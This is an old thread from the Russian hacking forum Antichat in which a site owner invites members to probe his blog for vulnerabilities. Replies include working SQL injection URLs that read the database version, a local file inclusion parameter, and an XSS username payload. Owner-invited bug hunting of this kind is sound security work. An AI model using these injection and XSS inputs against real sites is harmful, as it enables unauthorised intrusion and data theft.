Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   r0 (https://forum.antichat.xyz/showthread.php?t=39871)

r0 09.05.2007 16:02

r0
 
http://r0.jino-net.ru
Найденный баг - мое повышение репутации =)

BlackCats 09.05.2007 16:39

http://r0.jino-net.ru/comments.php?blog_id=32+order+by+5&act=comment
вот пока..
копаю дальше.

BlackCats 09.05.2007 16:41

http://r0.jino-net.ru/comments.php?blog_id=32+union+select+1,version(),3 ,4,5/*&act=comment
версия бд
5.0.26-standard
копаю дальше

BlackCats 09.05.2007 16:49

504 Gateway Time-out
ыыы
как я буду дальше копать когда оно ушло в даун??

r0 09.05.2007 16:51

BlackCats спасибо.
Done. Кто еще?
Цитата:

504 Gateway Time-out
ыыы
как я буду дальше копать когда оно ушло в даун??
Ну я тут не при делах =)

BlackCats 09.05.2007 17:28

http://r0.jino-net.ru/papers.php?down=ххх.пхп
локальный инклуд.. пишеш вместо ххх.пхп название странички и она должжна открыца так:
http://r0.jino-net.ru/ххх.пхп
хотя я незнаю что с этого можно поиметь..

BlackCats 09.05.2007 17:37

ну это вроде не уязвомость, но при комментарии можно заюзать тэки вокнуг ника и icq
т.е. например я могу сделать свой ник жирным,курсивным,подчёркну тым, + ещё сделать ссылкой на чтонить - заодно этим сделав его светым.

r0 09.05.2007 17:49

Цитата:

ну это вроде не уязвомость, но при комментарии можно заюзать тэки вокнуг ника и icq
т.е. например я могу сделать свой ник жирным,курсивным,подчёркну тым, + ещё сделать ссылкой на чтонить - заодно этим сделав его светым.
святым? =) Нет, это не уязвимость.. по крайней мере в моем понимании =/

v1ru$ 09.05.2007 18:33

Не знаю,как это поможет,но я просканил сайт на уязвимости Accuntex Web Vulnerability Scaner'ом,который присвоил критический уровень сайту.Вот отчёт самых "сильных" уязвимостей скачать с рапиды

freddi 09.05.2007 19:10

Пользователь с ником "><script>alert()</script> это круто, также нету проверки правельности ввода аськи и мыла. пароль при авторизации лучше под звездочками сделать. поле ник и пароль при регистрации почти совсем невидно.
если использовать тег юрл то получается он пытается открыть страницу http://r0.jino-net.ru/точтоввеливтег
http://r0.jino-net.ru/showusers.php
и где там юзер номер 5?)))
короче на плюс не притендую просто высказался)


Время: 03:42